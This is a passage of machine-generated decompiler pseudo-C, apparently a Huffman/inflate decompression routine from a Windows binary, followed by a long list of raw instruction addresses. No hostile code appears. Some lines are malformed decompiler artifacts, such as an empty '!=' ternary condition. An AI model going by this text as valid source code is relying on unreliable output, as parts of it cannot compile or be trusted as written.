                                                                            																	__ebp = __ebx[0x26e9];
                                                                            																	__eflags = __ebp -  *(__esp + 0x24);
                                                                            																	if(__eflags == 0) {
                                                                            																		goto L41;
                                                                            																	}
                                                                            																	L37:
                                                                            																	__ecx =  &(__ebx[0x6e8]);
                                                                            																	 *(__esp + 0x18) = __ecx;
                                                                            																	if(__eflags <= 0) {
                                                                            																		__ebp = __ebx[0x26e8];
                                                                            																		__ebp = __ebx[0x26e8] -  *(__esp + 0x24);
                                                                            																		__eflags = __ebp;
                                                                            																	} else {
                                                                            																		__ebp = __ebp -  *(__esp + 0x24);
                                                                            																		__ebp = __ebp - 1;
                                                                            																	}
                                                                            																	__eflags = __ebp;
                                                                            																	if(__ebp != 0) {
                                                                            																		goto L51;
                                                                            																	} else {
                                                                            																		goto L41;
                                                                            																	}
                                                                            																case 0xb:
                                                                            																	goto L0;
                                                                            																case 0xc:
                                                                            																	L60:
                                                                            																	_t574 = _t567[2];
                                                                            																	_t637 =  *(_t657 + 0x48);
                                                                            																	goto L65;
                                                                            																case 0xd:
                                                                            																	goto L71;
                                                                            																case 0xe:
                                                                            																	goto L194;
                                                                            																case 0xf:
                                                                            																	L174:
                                                                            																	__edx =  *(__esp + 0x48);
                                                                            																	__ebx[0x26ea] = __ecx;
                                                                            																	L00407FBE( *(__esp + 0x48));
                                                                            																	__ecx = __ebx[0x26ea];
                                                                            																	__eax = __ebx[0x26e9];
                                                                            																	 *(__esp + 0x18) = __ecx;
                                                                            																	__eflags = __ecx - __eax;
                                                                            																	if(__ecx < __eax) {
                                                                            																		L191:
                                                                            																		__edx =  *(__esp + 0x48);
                                                                            																		L192:
                                                                            																		 *(__esp + 0x1c) =  *(__esp + 0x1c) & 0x00000000;
                                                                            																		__ebx[0x146] = __esi;
                                                                            																		__esi =  *(__esp + 0x10);
                                                                            																		__ebx[0x147] = __edi;
                                                                            																		 *(__edx + 4) =  *(__esp + 0x10);
                                                                            																		goto L196;
                                                                            																	}
                                                                            																	L175:
                                                                            																	__ebp = __ebx[0x26e8];
                                                                            																	__ebp = __ebx[0x26e8] - __ecx;
                                                                            																	__eflags = __ecx - __eax;
                                                                            																	if(__ecx != __eax) {
                                                                            																		goto L191;
                                                                            																	}
                                                                            																	L176:
                                                                            																	__eax = __ebx[0x145];
                                                                            																	 *__ebx = __eax;
                                                                            																	__eflags = __eax - 8;
                                                                            																	if(__eax != 8) {
                                                                            																		L190:
                                                                            																		__edx =  *(__esp + 0x48);
                                                                            																		__ebx[0x146] = __esi;
                                                                            																		__esi =  *(__esp + 0x10);
                                                                            																		__ebx[0x147] = __edi;
                                                                            																		 *( *(__esp + 0x48) + 4) =  *(__esp + 0x10);
                                                                            																		 *(__esp + 0x1c) = 1;
                                                                            																		goto L196;
                                                                            																	}
                                                                            																	goto L177;
                                                                            															}
                                                                            														}
                                                                            														goto L194;
                                                                            													}
                                                                            													L110:
                                                                            													_t567[3] = _t532;
                                                                            													_t567[2] = _t609 + (_t609[2] & 0x0000ffff) * 4;
                                                                            													goto L22;
                                                                            												}
                                                                            												L108:
                                                                            												_t639 = 0xf;
                                                                            												_t567[2] = _t532 & _t639;
                                                                            												_t567[1] = _t609[2] & 0x0000ffff;
                                                                            												 *_t567 = 2;
                                                                            												goto L53;
                                                                            											}
                                                                            											L106:
                                                                            											_t567[2] = _t609[2] & 0x0000ffff;
                                                                            											 *_t567 = 6;
                                                                            											goto L22;
                                                                            										} else {
                                                                            											goto L187;
                                                                            										}
                                                                            									}
                                                                            									L72:
                                                                            									while(1) {
                                                                            										L76:
                                                                            										_t611 = _t567[0x143];
                                                                            										if(_t652 < _t611) {
                                                                            											break;
                                                                            										}
                                                                            										L77:
                                                                            										_t544 = _t567[0x144];
                                                                            										_t614 =  *(0x40b0c0 + _t611 * 2) & 0x0000ffff & _t647;
                                                                            										_t545 =  *(_t544 + 2 + _t614 * 4) & 0x0000ffff;
                                                                            										 *(_t657 + 0x24) =  *(_t544 + 1 + _t614 * 4) & 0x000000ff;
                                                                            										_t637 =  *(_t657 + 0x48);
                                                                            										 *(_t657 + 0x2c) = _t545;
                                                                            										if(_t545 >= 0x10) {
                                                                            											L79:
                                                                            											if(_t545 != 0x12) {
                                                                            												_t615 = _t545 - 0xe;
                                                                            											} else {
                                                                            												_t615 = 7;
                                                                            											}
                                                                            											 *(_t657 + 0x20) = _t615;
                                                                            											_t616 = 0xb;
                                                                            											_t546 = 3;
                                                                            											_t617 =  !=  ? _t546 : _t616;
                                                                            											_t547 =  *(_t657 + 0x20);
                                                                            											 *(_t657 + 0x28) =  !=  ? _t546 : _t616;
                                                                            											_t619 =  *(_t657 + 0x24) + _t547;
                                                                            											 *(_t657 + 0x30) = _t619;
                                                                            											if(_t652 >= _t619) {
                                                                            												L86:
                                                                            												_t651 = _t647 >>  *(_t657 + 0x24);
                                                                            												 *(_t657 + 0x28) = ( *(0x40b0c0 + _t547 * 2) & 0x0000ffff & _t651) +  *(_t657 + 0x28);
                                                                            												_t652 = _t652 - _t547 +  *(_t657 + 0x24);
                                                                            												_t647 = _t651 >> _t547;
                                                                            												_t625 = _t567[1];
                                                                            												 *(_t657 + 0x20) = _t567[2];
                                                                            												_t476 =  *(_t657 + 0x20) +  *(_t657 + 0x28);
                                                                            												if(_t476 > (_t625 & 0x0000001f) + (_t625 >> 0x00000005 & 0x0000001f) + 0x102) {
                                                                            													goto L188;
                                                                            												}
                                                                            												L87:
                                                                            												_t476 =  *(_t657 + 0x20);
                                                                            												if( *(_t657 + 0x2c) != 0x10) {
                                                                            													L90:
                                                                            													_t186 = _t657 + 0x2c;
                                                                            													 *_t186 =  *(_t657 + 0x2c) & 0x00000000;
                                                                            													L91:
                                                                            													_t646 =  *(_t657 + 0x2c);
                                                                            													_t629 =  &(_t567[_t476 + 3]);
                                                                            													do {
                                                                            														L92:
                                                                            														_t476 = _t476 + 1;
                                                                            														 *_t629 = _t646;
                                                                            														_t192 = _t657 + 0x28;
                                                                            														 *_t192 =  *(_t657 + 0x28) - 1;
                                                                            														_t629 =  &(_t629[1]);
                                                                            													} while ( *_t192 != 0);
                                                                            													_t637 =  *(_t657 + 0x48);
                                                                            													_t567[2] = _t476;
                                                                            													L94:
                                                                            													 *(_t657 + 0x20) = _t476;
                                                                            													_t555 = _t567[1];
                                                                            													 *(_t657 + 0x24) = _t555;
                                                                            													if( *(_t657 + 0x20) < (_t555 & 0x0000001f) + 0x102 + (_t555 >> 0x00000005 & 0x0000001f)) {
                                                                            														continue;
                                                                            													}
                                                                            													goto L95;
                                                                            												}
                                                                            												L88:
                                                                            												if(_t476 < 1) {
                                                                            													goto L188;
                                                                            												}
                                                                            												L89:
                                                                            												 *(_t657 + 0x2c) =  *(_t567 + 8 + _t476 * 4);
                                                                            												goto L91;
                                                                            											} else {
                                                                            												while(1) {
                                                                            													L83:
                                                                            													_t559 =  *(_t657 + 0x10);
                                                                            													if(_t559 == 0) {
                                                                            														goto L189;
                                                                            													}
                                                                            													L84:
                                                                            													_t634 = _t652;
                                                                            													 *(_t657 + 0x10) = _t559 - 1;
                                                                            													_t652 = _t652 + 8;
                                                                            													_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t634;
                                                                            													 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
                                                                            													if(_t652 <  *(_t657 + 0x30)) {
                                                                            														continue;
                                                                            													}
                                                                            													L85:
                                                                            													_t547 =  *(_t657 + 0x20);
                                                                            													goto L86;
                                                                            												}
                                                                            												goto L189;
                                                                            											}
                                                                            										}
                                                                            										L78:
                                                                            										_t635 =  *(_t657 + 0x24);
                                                                            										_t652 = _t652 - _t635;
                                                                            										_t647 = _t647 >> _t635;
                                                                            										 *(_t567 + 0xc + _t567[2] * 4) =  *(_t657 + 0x2c);
                                                                            										_t567[2] = _t567[2] + 1;
                                                                            										_t476 = _t567[2];
                                                                            										goto L94;
                                                                            									}
                                                                            									L74:
                                                                            									_t539 =  *(_t657 + 0x10);
                                                                            									if(_t539 == 0) {
                                                                            										goto L189;
                                                                            									}
                                                                            									L75:
                                                                            									 *(_t657 + 0x10) = _t539 - 1;
                                                                            									_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
                                                                            									 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
                                                                            									_t652 = _t652 + 8;
                                                                            									goto L76;
                                                                            								}
                                                                            							} else {
                                                                            								goto L67;
                                                                            							}
                                                                            							do {
                                                                            								L67:
                                                                            								_t105 = _t567[2] + 0x4099b0; // 0x121110
                                                                            								 *(_t567 + 0xc +  *_t105 * 4) =  *(_t567 + 0xc +  *_t105 * 4) & 0x00000000;
                                                                            								_t567[2] = _t567[2] + 1;
                                                                            							} while (_t567[2] < _t638);
                                                                            							goto L68;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            			}






















































                                                                            0x004075fe
                                                                            0x004075fe
                                                                            0x004075fe
                                                                            0x004075fe
                                                                            0x004075fe
                                                                            0x004075fe
                                                                            0x004075fe
                                                                            0x00000000
                                                                            0x00407629
                                                                            0x00407606
                                                                            0x00407ee0
                                                                            0x00407ee0
                                                                            0x00407ee5
                                                                            0x00407eeb
                                                                            0x00407ef1
                                                                            0x00407f5a
                                                                            0x00407f5e
                                                                            0x00407f65
                                                                            0x00407f6b
                                                                            0x00407f70
                                                                            0x00407f74
                                                                            0x00407f7b
                                                                            0x00407f7b
                                                                            0x0040760c
                                                                            0x0040760f
                                                                            0x0040761c
                                                                            0x0040761e
                                                                            0x00407622
                                                                            0x00407626
                                                                            0x00407626
                                                                            0x00407630
                                                                            0x00407638
                                                                            0x00407640
                                                                            0x00407ea3
                                                                            0x00407ea3
                                                                            0x00407ead
                                                                            0x00407eb3
                                                                            0x00407eb9
                                                                            0x00000000
                                                                            0x00407658
                                                                            0x00407658
                                                                            0x00407658
                                                                            0x0040765b
                                                                            0x0040765e
                                                                            0x00407662
                                                                            0x00407666
                                                                            0x0040766c
                                                                            0x0040766c
                                                                            0x0040766c
                                                                            0x0040766f
                                                                            0x00000000
                                                                            0x004076c9
                                                                            0x0040769a
                                                                            0x0040769a
                                                                            0x0040769c
                                                                            0x0040769f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407675
                                                                            0x00407675
                                                                            0x0040767b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407681
                                                                            0x00407684
                                                                            0x00407691
                                                                            0x00407693
                                                                            0x00407697
                                                                            0x00407697
                                                                            0x004076a1
                                                                            0x004076a3
                                                                            0x004076a4
                                                                            0x004076a6
                                                                            0x004076ab
                                                                            0x004076b0
                                                                            0x004076b7
                                                                            0x004076be
                                                                            0x004076bf
                                                                            0x004076c0
                                                                            0x004076c2
                                                                            0x004076c5
                                                                            0x004076c5
                                                                            0x004076d8
                                                                            0x004076db
                                                                            0x004076f4
                                                                            0x004076f6
                                                                            0x004076f7
                                                                            0x00407702
                                                                            0x00407722
                                                                            0x00407729
                                                                            0x00407764
                                                                            0x00407764
                                                                            0x00000000
                                                                            0x00407733
                                                                            0x00407733
                                                                            0x00407733
                                                                            0x00407736
                                                                            0x0040773c
                                                                            0x0040773c
                                                                            0x00407741
                                                                            0x00407745
                                                                            0x0040775c
                                                                            0x004078fc
                                                                            0x004078fc
                                                                            0x00407904
                                                                            0x0040790d
                                                                            0x00407920
                                                                            0x00407926
                                                                            0x0040792e
                                                                            0x0040793d
                                                                            0x0040795f
                                                                            0x0040796b
                                                                            0x0040796c
                                                                            0x00407971
                                                                            0x00407ec1
                                                                            0x00407ec1
                                                                            0x00407ec5
                                                                            0x00407ec5
                                                                            0x00407ecf
                                                                            0x00407ed5
                                                                            0x00407edb
                                                                            0x00407f53
                                                                            0x00407f56
                                                                            0x00000000
                                                                            0x00407f56
                                                                            0x00407977
                                                                            0x004079a9
                                                                            0x004079b0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004079b6
                                                                            0x004079b6
                                                                            0x004079bc
                                                                            0x004079cc
                                                                            0x004079d0
                                                                            0x004079d3
                                                                            0x004079da
                                                                            0x004079e1
                                                                            0x004079e4
                                                                            0x004079e7
                                                                            0x004079eb
                                                                            0x004079f1
                                                                            0x004079f4
                                                                            0x004079f8
                                                                            0x004079fe
                                                                            0x004079fe
                                                                            0x00407a29
                                                                            0x00407a29
                                                                            0x00407a29
                                                                            0x00407a2e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407a04
                                                                            0x00407a06
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407a0c
                                                                            0x00407a0f
                                                                            0x00407a1c
                                                                            0x00407a1e
                                                                            0x00407a22
                                                                            0x00407a26
                                                                            0x00407a26
                                                                            0x00407a30
                                                                            0x00407a38
                                                                            0x00407a3b
                                                                            0x00407a3d
                                                                            0x00407a40
                                                                            0x00407a45
                                                                            0x00407a47
                                                                            0x00407a49
                                                                            0x00407a4b
                                                                            0x00407a4f
                                                                            0x00407a53
                                                                            0x00407a58
                                                                            0x00407a6c
                                                                            0x00407a6e
                                                                            0x00407a8e
                                                                            0x00407a90
                                                                            0x00407aa4
                                                                            0x00407aa6
                                                                            0x00407f36
                                                                            0x00407f36
                                                                            0x00407f3a
                                                                            0x00407f3a
                                                                            0x00407f3e
                                                                            0x00407f44
                                                                            0x00407f4a
                                                                            0x00407f50
                                                                            0x00000000
                                                                            0x00407f50
                                                                            0x00407aac
                                                                            0x00407aae
                                                                            0x00407aaf
                                                                            0x00407473
                                                                            0x00407e22
                                                                            0x00407e22
                                                                            0x00407e26
                                                                            0x00407e28
                                                                            0x00000000
                                                                            0x00407e29
                                                                            0x004072f1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407ab6
                                                                            0x00407ab6
                                                                            0x00407ae1
                                                                            0x00407ae1
                                                                            0x00407ae1
                                                                            0x00407ae4
                                                                            0x00407ae6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407abc
                                                                            0x00407abc
                                                                            0x00407abe
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407ac4
                                                                            0x00407ac4
                                                                            0x00407ac5
                                                                            0x00407ac7
                                                                            0x00407acf
                                                                            0x00407ad2
                                                                            0x00407ad4
                                                                            0x00407ad6
                                                                            0x00407ada
                                                                            0x00407ade
                                                                            0x00407ade
                                                                            0x00407ade
                                                                            0x00407ae8
                                                                            0x00407ae8
                                                                            0x00407af0
                                                                            0x00407af2
                                                                            0x00407af4
                                                                            0x00407af7
                                                                            0x00407af7
                                                                            0x00407af9
                                                                            0x00407afd
                                                                            0x00407b00
                                                                            0x00407b03
                                                                            0x00407b06
                                                                            0x00407b08
                                                                            0x00407b09
                                                                            0x00407b0b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407b0f
                                                                            0x00407b0f
                                                                            0x00407b3a
                                                                            0x00407b3a
                                                                            0x00407b3a
                                                                            0x00407b3d
                                                                            0x00407b3f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407b15
                                                                            0x00407b15
                                                                            0x00407b17
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407b1d
                                                                            0x00407b1d
                                                                            0x00407b1e
                                                                            0x00407b20
                                                                            0x00407b28
                                                                            0x00407b2b
                                                                            0x00407b2d
                                                                            0x00407b2f
                                                                            0x00407b33
                                                                            0x00407b37
                                                                            0x00407b37
                                                                            0x00407b37
                                                                            0x00407b41
                                                                            0x00407b41
                                                                            0x00407b49
                                                                            0x00407b4e
                                                                            0x00407b51
                                                                            0x00407b55
                                                                            0x00407b59
                                                                            0x00407b5b
                                                                            0x00407b5e
                                                                            0x00407b60
                                                                            0x00407b64
                                                                            0x00407b66
                                                                            0x00407b86
                                                                            0x00407b86
                                                                            0x00407b88
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407b8e
                                                                            0x00407b8e
                                                                            0x00000000
                                                                            0x00407b8e
                                                                            0x00407b68
                                                                            0x00407b68
                                                                            0x00407b6a
                                                                            0x00407b6b
                                                                            0x00407b6d
                                                                            0x00407b71
                                                                            0x00407b74
                                                                            0x00407b78
                                                                            0x00407b7b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407b97
                                                                            0x00407b97
                                                                            0x00407bc2
                                                                            0x00407bc2
                                                                            0x00407bc2
                                                                            0x00407bc5
                                                                            0x00407bc7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407b9d
                                                                            0x00407b9d
                                                                            0x00407b9f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407ba5
                                                                            0x00407ba5
                                                                            0x00407ba6
                                                                            0x00407ba8
                                                                            0x00407bb0
                                                                            0x00407bb3
                                                                            0x00407bb5
                                                                            0x00407bb7
                                                                            0x00407bbb
                                                                            0x00407bbf
                                                                            0x00407bbf
                                                                            0x00407bbf
                                                                            0x00407bc9
                                                                            0x00407bc9
                                                                            0x00407bd1
                                                                            0x00407bd3
                                                                            0x00407bd5
                                                                            0x00407bd8
                                                                            0x00407bd8
                                                                            0x00407bda
                                                                            0x00407bde
                                                                            0x00407be2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407be8
                                                                            0x00407be8
                                                                            0x00407bee
                                                                            0x00407bf0
                                                                            0x00407bf5
                                                                            0x00407bf8
                                                                            0x00407c0e
                                                                            0x00407c10
                                                                            0x00407c10
                                                                            0x00407bfa
                                                                            0x00407c00
                                                                            0x00407c05
                                                                            0x00407c0a
                                                                            0x00407c0a
                                                                            0x00407c13
                                                                            0x00407c17
                                                                            0x00407c1b
                                                                            0x00407c21
                                                                            0x00407c21
                                                                            0x00407c21
                                                                            0x00407c23
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407c29
                                                                            0x00407c29
                                                                            0x00407c2f
                                                                            0x00407c56
                                                                            0x00407c57
                                                                            0x00407c5d
                                                                            0x00407c62
                                                                            0x00407c68
                                                                            0x00407c6e
                                                                            0x00407c72
                                                                            0x00407c76
                                                                            0x00407c78
                                                                            0x00407c87
                                                                            0x00407c8d
                                                                            0x00407c8f
                                                                            0x00407c8f
                                                                            0x00407c7a
                                                                            0x00407c7a
                                                                            0x00407c7c
                                                                            0x00407c82
                                                                            0x00407c84
                                                                            0x00407c84
                                                                            0x00407c91
                                                                            0x00407c95
                                                                            0x00407c97
                                                                            0x00407c99
                                                                            0x00407c9f
                                                                            0x00407ca5
                                                                            0x00407ca7
                                                                            0x00407cad
                                                                            0x00407caf
                                                                            0x00407cb3
                                                                            0x00407cb5
                                                                            0x00407cbc
                                                                            0x00407cc0
                                                                            0x00407cc0
                                                                            0x00407cb7
                                                                            0x00407cb7
                                                                            0x00407cb9
                                                                            0x00407cb9
                                                                            0x00407cb5
                                                                            0x00407ca5
                                                                            0x00407cc2
                                                                            0x00407cc4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407cc4
                                                                            0x00407c31
                                                                            0x00407c31
                                                                            0x00407c37
                                                                            0x00407c3d
                                                                            0x00407c3f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407c41
                                                                            0x00407c41
                                                                            0x00407c43
                                                                            0x00407c4a
                                                                            0x00407c50
                                                                            0x00407c50
                                                                            0x00407c45
                                                                            0x00407c45
                                                                            0x00407c47
                                                                            0x00407c47
                                                                            0x00407c52
                                                                            0x00407c54
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407cca
                                                                            0x00407cca
                                                                            0x00407cce
                                                                            0x00407cd0
                                                                            0x00407cd2
                                                                            0x00407cd3
                                                                            0x00407cd7
                                                                            0x00407cd8
                                                                            0x00407cdc
                                                                            0x00407cdd
                                                                            0x00407ce1
                                                                            0x00407ce7
                                                                            0x00407ce9
                                                                            0x00407cef
                                                                            0x00407cef
                                                                            0x00407cf3
                                                                            0x00407cf3
                                                                            0x00407cf3
                                                                            0x00407cf3
                                                                            0x00407c21
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407d05
                                                                            0x00407d05
                                                                            0x00407d09
                                                                            0x00407d0b
                                                                            0x00407db2
                                                                            0x00407db2
                                                                            0x00407db5
                                                                            0x00407db7
                                                                            0x00407db8
                                                                            0x00407dbc
                                                                            0x00407cfd
                                                                            0x00407cfd
                                                                            0x00000000
                                                                            0x00407cfd
                                                                            0x00407d11
                                                                            0x00407d11
                                                                            0x00407d17
                                                                            0x00407d3e
                                                                            0x00407d3f
                                                                            0x00407d45
                                                                            0x00407d4a
                                                                            0x00407d50
                                                                            0x00407d56
                                                                            0x00407d5a
                                                                            0x00407d5e
                                                                            0x00407d60
                                                                            0x00407d6f
                                                                            0x00407d75
                                                                            0x00407d77
                                                                            0x00407d77
                                                                            0x00407d62
                                                                            0x00407d62
                                                                            0x00407d64
                                                                            0x00407d6a
                                                                            0x00407d6c
                                                                            0x00407d6c
                                                                            0x00407d79
                                                                            0x00407d7d
                                                                            0x00407d7f
                                                                            0x00407d81
                                                                            0x00407d87
                                                                            0x00407d8d
                                                                            0x00407d8f
                                                                            0x00407d95
                                                                            0x00407d97
                                                                            0x00407d9b
                                                                            0x00407d9d
                                                                            0x00407da4
                                                                            0x00407da8
                                                                            0x00407da8
                                                                            0x00407d9f
                                                                            0x00407d9f
                                                                            0x00407da1
                                                                            0x00407da1
                                                                            0x00407d9d
                                                                            0x00407d8d
                                                                            0x00407daa
                                                                            0x00407dac
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407dac
                                                                            0x00407d19
                                                                            0x00407d19
                                                                            0x00407d1f
                                                                            0x00407d25
                                                                            0x00407d27
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407d29
                                                                            0x00407d29
                                                                            0x00407d2b
                                                                            0x00407d32
                                                                            0x00407d38
                                                                            0x00407d38
                                                                            0x00407d2d
                                                                            0x00407d2d
                                                                            0x00407d2f
                                                                            0x00407d2f
                                                                            0x00407d3a
                                                                            0x00407d3c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407dc2
                                                                            0x00407dc2
                                                                            0x00407dc4
                                                                            0x00407dc5
                                                                            0x00407dc7
                                                                            0x00407dc9
                                                                            0x00407dcc
                                                                            0x00407dcd
                                                                            0x00407dcd
                                                                            0x00407dcd
                                                                            0x00407dd1
                                                                            0x00407dd5
                                                                            0x00407dd5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004072f8
                                                                            0x004072f8
                                                                            0x004072fc
                                                                            0x004072ff
                                                                            0x00407336
                                                                            0x00407338
                                                                            0x0040733b
                                                                            0x0040733e
                                                                            0x00407341
                                                                            0x00407345
                                                                            0x00407347
                                                                            0x00407349
                                                                            0x0040734a
                                                                            0x0040734f
                                                                            0x0040735b
                                                                            0x0040735f
                                                                            0x00407363
                                                                            0x00407363
                                                                            0x00407366
                                                                            0x0040747c
                                                                            0x0040747c
                                                                            0x00407480
                                                                            0x00407486
                                                                            0x00407489
                                                                            0x0040748b
                                                                            0x0040748e
                                                                            0x00000000
                                                                            0x0040748e
                                                                            0x0040736c
                                                                            0x0040736c
                                                                            0x0040736c
                                                                            0x0040736f
                                                                            0x00407393
                                                                            0x00407393
                                                                            0x0040739a
                                                                            0x00407450
                                                                            0x00407450
                                                                            0x00407455
                                                                            0x00407458
                                                                            0x0040745d
                                                                            0x00407460
                                                                            0x00407465
                                                                            0x00407468
                                                                            0x0040746d
                                                                            0x0040746d
                                                                            0x00407470
                                                                            0x00000000
                                                                            0x004073a0
                                                                            0x004073a0
                                                                            0x004073a5
                                                                            0x004073a5
                                                                            0x004073a7
                                                                            0x004073a9
                                                                            0x004073aa
                                                                            0x004073aa
                                                                            0x004073aa
                                                                            0x004073ac
                                                                            0x004073ad
                                                                            0x004073b2
                                                                            0x004073b4
                                                                            0x004073b9
                                                                            0x004073c0
                                                                            0x004073c2
                                                                            0x004073c7
                                                                            0x004073c8
                                                                            0x004073c8
                                                                            0x004073bb
                                                                            0x004073bb
                                                                            0x004073bd
                                                                            0x004073bd
                                                                            0x004073b9
                                                                            0x004073cb
                                                                            0x004073cb
                                                                            0x004073d2
                                                                            0x004073d8
                                                                            0x004073d8
                                                                            0x004073dc
                                                                            0x00407409
                                                                            0x0040740e
                                                                            0x00407410
                                                                            0x00407411
                                                                            0x00407413
                                                                            0x0040741b
                                                                            0x0040741b
                                                                            0x00407440
                                                                            0x00407445
                                                                            0x00407449
                                                                            0x00000000
                                                                            0x00407449
                                                                            0x0040739a
                                                                            0x00407371
                                                                            0x00407371
                                                                            0x00407371
                                                                            0x00407374
                                                                            0x00407388
                                                                            0x00000000
                                                                            0x00407388
                                                                            0x00407376
                                                                            0x00407376
                                                                            0x00407379
                                                                            0x0040737d
                                                                            0x00000000
                                                                            0x00407383
                                                                            0x00000000
                                                                            0x00407383
                                                                            0x00407301
                                                                            0x00407301
                                                                            0x00407305
                                                                            0x00407305
                                                                            0x00407305
                                                                            0x00407307
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040730d
                                                                            0x0040730e
                                                                            0x00407317
                                                                            0x00407319
                                                                            0x00407320
                                                                            0x00407322
                                                                            0x00407324
                                                                            0x00407325
                                                                            0x00407326
                                                                            0x00407328
                                                                            0x0040732c
                                                                            0x00407330
                                                                            0x00000000
                                                                            0x00407332
                                                                            0x00000000
                                                                            0x00407332
                                                                            0x00407330
                                                                            0x00000000
                                                                            0x00407305
                                                                            0x00000000
                                                                            0x00407494
                                                                            0x00407494
                                                                            0x00407498
                                                                            0x0040749b
                                                                            0x004074d0
                                                                            0x004074d0
                                                                            0x004074d3
                                                                            0x004074d5
                                                                            0x004074d7
                                                                            0x004074da
                                                                            0x004074de
                                                                            0x004074e0
                                                                            0x004074e7
                                                                            0x004074e2
                                                                            0x004074e2
                                                                            0x004074e4
                                                                            0x004074e4
                                                                            0x004074ed
                                                                            0x00000000
                                                                            0x004074ed
                                                                            0x0040749d
                                                                            0x0040749d
                                                                            0x004074a1
                                                                            0x004074a1
                                                                            0x004074a1
                                                                            0x004074a3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004074a9
                                                                            0x004074aa
                                                                            0x004074ae
                                                                            0x004074b1
                                                                            0x004074b3
                                                                            0x004074b5
                                                                            0x004074b8
                                                                            0x004074bc
                                                                            0x004074be
                                                                            0x004074c2
                                                                            0x004074c3
                                                                            0x004074c7
                                                                            0x004074ca
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004074cc
                                                                            0x004074cc
                                                                            0x00000000
                                                                            0x004074cc
                                                                            0x00407e36
                                                                            0x00407e3a
                                                                            0x00407e40
                                                                            0x00407e46
                                                                            0x00407e46
                                                                            0x00407e46
                                                                            0x00407e4a
                                                                            0x00407e4c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004074f4
                                                                            0x004074f4
                                                                            0x004074f8
                                                                            0x004074fa
                                                                            0x00407e85
                                                                            0x00407e85
                                                                            0x00407e89
                                                                            0x00407e8f
                                                                            0x00407e95
                                                                            0x00407e99
                                                                            0x00407e9b
                                                                            0x00407e52
                                                                            0x00407e52
                                                                            0x00407e53
                                                                            0x00407e53
                                                                            0x00407e58
                                                                            0x00000000
                                                                            0x00407e58
                                                                            0x00407500
                                                                            0x00407500
                                                                            0x00407502
                                                                            0x004075a9
                                                                            0x004075a9
                                                                            0x004075ad
                                                                            0x004075af
                                                                            0x004075b1
                                                                            0x004075b4
                                                                            0x004075b7
                                                                            0x004075c3
                                                                            0x004075c7
                                                                            0x004075c9
                                                                            0x004075cd
                                                                            0x004075cf
                                                                            0x004075d3
                                                                            0x004075d5
                                                                            0x004075d5
                                                                            0x004075d5
                                                                            0x004075d8
                                                                            0x004075dc
                                                                            0x004075de
                                                                            0x004075e2
                                                                            0x004075e6
                                                                            0x004075e7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004075ed
                                                                            0x004075ed
                                                                            0x004075f3
                                                                            0x004075f5
                                                                            0x004075f5
                                                                            0x00000000
                                                                            0x004075f5
                                                                            0x00407508
                                                                            0x00407508
                                                                            0x0040750e
                                                                            0x00407547
                                                                            0x00407548
                                                                            0x0040754e
                                                                            0x00407553
                                                                            0x00407559
                                                                            0x0040755f
                                                                            0x00407565
                                                                            0x00407569
                                                                            0x0040756b
                                                                            0x00407574
                                                                            0x00407576
                                                                            0x00407576
                                                                            0x0040756d
                                                                            0x0040756f
                                                                            0x00407571
                                                                            0x00407571
                                                                            0x00407578
                                                                            0x0040757a
                                                                            0x0040757c
                                                                            0x00407582
                                                                            0x00407584
                                                                            0x00407586
                                                                            0x00407588
                                                                            0x0040758c
                                                                            0x00407595
                                                                            0x0040759b
                                                                            0x0040759b
                                                                            0x0040758e
                                                                            0x00407592
                                                                            0x00407592
                                                                            0x0040758c
                                                                            0x00407584
                                                                            0x0040759d
                                                                            0x0040759f
                                                                            0x00407e5f
                                                                            0x00407e5f
                                                                            0x00407e63
                                                                            0x00407e67
                                                                            0x00407e6d
                                                                            0x00407e71
                                                                            0x00407e77
                                                                            0x00407e7a
                                                                            0x00407e7c
                                                                            0x00407e82
                                                                            0x00000000
                                                                            0x004075a5
                                                                            0x004075a5
                                                                            0x004075a5
                                                                            0x00000000
                                                                            0x004075a5
                                                                            0x0040759f
                                                                            0x00407510
                                                                            0x00407510
                                                                            0x00407516
                                                                            0x0040751a
                                                                            0x00407520
                                                                            0x00407524
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407526
                                                                            0x00407526
                                                                            0x0040752c
                                                                            0x00407530
                                                                            0x00407539
                                                                            0x0040753f
                                                                            0x0040753f
                                                                            0x00407532
                                                                            0x00407532
                                                                            0x00407536
                                                                            0x00407536
                                                                            0x00407543
                                                                            0x00407545
